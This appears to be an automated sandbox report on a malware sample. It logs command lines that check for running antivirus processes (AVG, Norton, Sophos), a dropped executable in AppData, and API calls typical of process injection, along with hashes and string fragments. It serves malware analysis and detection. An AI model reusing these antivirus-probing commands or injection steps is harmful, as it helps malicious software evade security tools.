                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff7b65d0000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "avgui.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff701940000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff675890000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff7b65d0000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff701940000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff72bec0000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                                                                            Imagebase:0x7ff7b65d0000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                                            Start time:13:05:06
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff701940000
                                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                                            Start time:13:05:11
                                                                                                                                                                                                                                                            Start date:01/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:846'325'235 bytes
                                                                                                                                                                                                                                                            MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true


                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:1.6%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                              Signature Coverage:31.6%
                                                                                                                                                                                                                                                              Total number of Nodes:117
                                                                                                                                                                                                                                                              Total number of Limit Nodes:11
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 02070402
                                                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000), ref: 020704AA
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0207081E
                                                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 020708D3
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 020708F0
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02070993
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 020709C6
                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02070B37
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1248616170-0
                                                                                                                                                                                                                                                              • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                                              • Instruction ID: 1d20b54adf63eb44ca4c34f465efe1526e6678b8638cbccaf3303ace3f2efc59
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F428C71A08301AFD765CF24C844B6BB7EAEF88718F044A2DF9899B241E770E944DB95

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,020205FF,?,00000001,?,81EC8B55,000000FF), ref: 02020AF7
                                                                                                                                                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 02020B23
                                                                                                                                                                                                                                                              • Wow64SuspendThread.KERNEL32(00000000), ref: 02020B76
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02020BA0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1849706056-0
                                                                                                                                                                                                                                                              • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                                              • Instruction ID: ae4046f9bf82bb1754c0b628e4b808a58a3671e112f936740a51525cf41ecf25
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F411C71B00218AFDB19DF98C890BADB7F6EF88304F10C069E6159B7A4DB34AE45CB54

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02020A35
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                                                                                                              • String ID: ,
                                                                                                                                                                                                                                                              • API String ID: 2422867632-3772416878
                                                                                                                                                                                                                                                              • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                                              • Instruction ID: d366e3d89a3afb94df81183069134951292917b7dc5c1295edd82a2bcf520fb7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D141C374A00209EFDB04CF98C994BAEB7B2FF98314F208199D5156B390C771AE85DF94

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0202064C
                                                                                                                                                                                                                                                              • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02020940
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateProcessTerminateThread
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1197810419-0
                                                                                                                                                                                                                                                              • Opcode ID: 68cb2f7865c6344c0eb42f166750cb2d3eabdbe292026f519db6a63cbfcf1d03
                                                                                                                                                                                                                                                              • Instruction ID: 6fc43466d5e6c0267288d401dea1c5b3db8f61de5e004a90682dc32b2c814bb4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68cb2f7865c6344c0eb42f166750cb2d3eabdbe292026f519db6a63cbfcf1d03
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA12C2B4E00219DFDB14CF98C990BADBBB2FF88304F2481AAD515AB385D734AA45DF54

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,?,?), ref: 02071079
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                                                                                              • API String ID: 1029625771-2738580789
                                                                                                                                                                                                                                                              • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                                              • Instruction ID: df39e2e7138cc2d9cb4d323a35306dae75e612ea02f0f838c1ad1047f016b135
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A210535A003C59FDB62CF68C444B69BBE4AF05324F18406CD809A7681D7B0E845A7C4

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0206FCB3
                                                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 0206FFF7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                                                                                              • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                                              • Instruction ID: 787d707ec3e6efbaca2edccecfe1388e4bdbda8fa95a5c676f376eb417ab008c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93B1C231500702AFDB629FA0EC8CBBBF7EAFF0A354F140519E95A86940E731E550EB91
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $#$#$$$%cp$'$)$*$*$+$-$0$0$1$2$2$@$@$B$D$D$D$D$F$F$H$H$H$J$J$J$J$K$L$L$N$N$O$P$P$P$R$R$T$T$T$U$V$V$V$W$X$X$Z$Z$[$Ky$\$\$]$^$^$`$`$b$d$d$e$f$h$h$j$j$l$n$p$q$q$r$t$t$v$x$z$|$}$~
                                                                                                                                                                                                                                                              • API String ID: 0-2887741200
                                                                                                                                                                                                                                                              • Opcode ID: 580b4cde6b63d2dff4980e5e54c8b8d4fa16d9793e158013a6970ccc2d0448f5
                                                                                                                                                                                                                                                              • Instruction ID: 8a2b28f83b82dd8dffd9772dcc37ec0bfdd60c94e747435be521f401af903baa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 580b4cde6b63d2dff4980e5e54c8b8d4fa16d9793e158013a6970ccc2d0448f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D923BE3250C7D08BD3368B3888543AFBBD5ABD6324F098A6DD5E98B3D2D6798405DB43

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: /$0$0$1$1$2$2$B$F$X$[$[$^$s$s$t$|WL}
                                                                                                                                                                                                                                                              • API String ID: 0-2661351163
                                                                                                                                                                                                                                                              • Opcode ID: 4ad607f0fd3734a1e1a4529355bdbb13b264922a835e985a3c30ece3c5d024a0
                                                                                                                                                                                                                                                              • Instruction ID: 41ec0f62c406d84f481bb21ea99daa2932fff0b0048845aefd74adfa92582527
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ad607f0fd3734a1e1a4529355bdbb13b264922a835e985a3c30ece3c5d024a0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7771F61261C7E14EE3028638485425FAFD24BE3124F1D8FADE8E5873C3C565C90AD3A3

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: &$&$)$+$/$5$6$;$;$=$C$M$M$V
                                                                                                                                                                                                                                                              • API String ID: 0-1573904596
                                                                                                                                                                                                                                                              • Opcode ID: 3babcfd77a9c43872817e20e023e40d4e8e1275384241b6f8e243a872365ba1a
                                                                                                                                                                                                                                                              • Instruction ID: 70a322f14f4d72553a20af3d56e5914fa1dbeaa5dcda819209a772b6ba7c64f9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3babcfd77a9c43872817e20e023e40d4e8e1275384241b6f8e243a872365ba1a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2182B07150C7908FD325DF38C4943AEBBE6AB89320F198A6ED8D9873C1D6788945DB43
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: "-&4$"2,,$1660$3V_y$6$=kX^$GXWY$Kz$T S3$gD$lA*=$w,!>$x|ls
                                                                                                                                                                                                                                                              • API String ID: 0-2433764711
                                                                                                                                                                                                                                                              • Opcode ID: adf049959d03f121f274ef9b3f934a1a7aec0ad2ee27bcb2414d3143df8b966d
                                                                                                                                                                                                                                                              • Instruction ID: 40fc8dfcfe0efac5ec96221a6a545e6df6c714dc22aa67bf99f23053c140338d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: adf049959d03f121f274ef9b3f934a1a7aec0ad2ee27bcb2414d3143df8b966d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0625AB050C3918BC72ACF28885066EFFE2AF96314F18C67DE9E557392DB318509DB52

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $$$+$4$C$D$E$Q$R$S$d$~
                                                                                                                                                                                                                                                              • API String ID: 0-3353130204
                                                                                                                                                                                                                                                              • Opcode ID: 834423760a171886d2f265adfd9c0b98d8bb2a844679e98d0fb0a64bd4d72020
                                                                                                                                                                                                                                                              • Instruction ID: d6d433378ff2d5c9cea9210a0f3d6b4138aec02cadffe1b0b2cc7663c3bb67f6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 834423760a171886d2f265adfd9c0b98d8bb2a844679e98d0fb0a64bd4d72020
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E72C872A0C7908FD325DF38C89439EBBD56BC5320F198A6ED8E9D73C1D67488459B42

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: AC$CG$H7$Jw$Tv%t$WL$de$+%$IK$MO$uw$zx
                                                                                                                                                                                                                                                              • API String ID: 0-3915312366
                                                                                                                                                                                                                                                              • Opcode ID: 22cb1d7f73685dfc8f92ccdc369170f395ad8c892094d57c2505d72ccd2aa43c
                                                                                                                                                                                                                                                              • Instruction ID: 6ca39b5d7c7bf37238473769a5f6e60d76cd59ac684c0eb6d6aa736534ecdb77
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22cb1d7f73685dfc8f92ccdc369170f395ad8c892094d57c2505d72ccd2aa43c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8532F9B520D7958AD330CF55D402BCFBAF2EB92304F008D1DC5D96B206DBB5864A8B9B

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: -(X0$-,$046=$<d0q$B<@=$E~DA$KumW$Up$^jm#$cURr$p$vM{z
                                                                                                                                                                                                                                                              • API String ID: 0-261454887
                                                                                                                                                                                                                                                              • Opcode ID: 9cfbe5d0dcf48ca78acd10c6400799df5c8f3d4f4692196ad975901a62baa90c
                                                                                                                                                                                                                                                              • Instruction ID: 293c2a5665bd92338361c3e3610e52f5039317f27c4f4a9b1beb5c15c21d1174
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9cfbe5d0dcf48ca78acd10c6400799df5c8f3d4f4692196ad975901a62baa90c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADC147B264C3A08BC316CF74889076BFFE19F93205F0889ADE4D55B242DB39850ED796

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2020000_Setup.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $5$E$G$Z$[$n$r$u
                                                                                                                                                                                                                                                              • API String ID: 0-2784298394
                                                                                                                                                                                                                                                              • Opcode ID: 6470f8f5d99695c76714c72dcebd137a25efcca86b6d7e00e90e01edcd019a4c
                                                                                                                                                                                                                                                              • Instruction ID: f1a665a6d65b051050d4b349862d2bdad44ce79905d10daad9e3205747442b9d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6470f8f5d99695c76714c72dcebd137a25efcca86b6d7e00e90e01edcd019a4c
